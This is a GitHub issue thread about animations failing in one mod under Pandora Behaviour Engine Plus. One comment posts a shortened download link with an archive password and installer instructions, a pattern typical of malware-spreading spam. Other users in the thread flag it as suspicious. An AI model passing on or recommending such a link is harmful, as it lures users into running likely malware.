### ISSUE TITLE
[Bug]: The animations in Mod ”Dogma's thief‘’ are not working.

### ISSUE THREAD

**Issue by TOHgoat** [Monitor221hz/Pandora-Behaviour-Engine-Plus#299]
### Check for duplicate issues

- [X] I have verified that there are no duplicate [issues](https://github.com/Monitor144hz/Pandora-Behaviour-Engine-Plus/issues).

### Version

2.3.0

### Provide Instructions on Reproducing the Problem

All animations are not effective on this mod(dogma's thief on loverslab), and the characters repeats the T pose.

### Provide Relevant Files

[Pandora._Output.zip](https://github.com/user-attachments/files/16766293/Pandora._Output.zip)
[Engine.log](https://github.com/user-attachments/files/16766294/Engine.log)

### Contributing To Development

- [X] I read this project's [Contributing To Development](https://github.com/Monitor144hz/Pandora-Behaviour-Engine-Plus/wiki/Contributing-To-Development)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by TOHgoat** [comment]
> 下载 https://bit.ly/3MjP129 密码：changeme 在安装程序菜单中，选择“gcc”。

What's this?It warns me that it is harmful.

**Comment by MK99MA** [comment]
Another account already posted this for a completely different issue before here which was deleted by Monitor.
https://github.com/Monitor221hz/Pandora-Behaviour-Engine-Plus/issues/296

Based on that I'm pretty sure you don't want to download / run whatever this is, not to mention that a link shortener is highly suspect given that he could link to a github project if it was remotely connected to this.

**Comment by TOHgoat** [comment]
> Another account already posted this for a completely different issue before here which was deleted by Monitor. #296
> 
> Based on that I'm pretty sure you don't want to download / run whatever this is, not to mention that a link shortener is highly suspect given that he could link to a github project if it was remotely connected to this.

Yes, it is indeed quite suspicious and disturbing, maybe Monitor will remove the post.
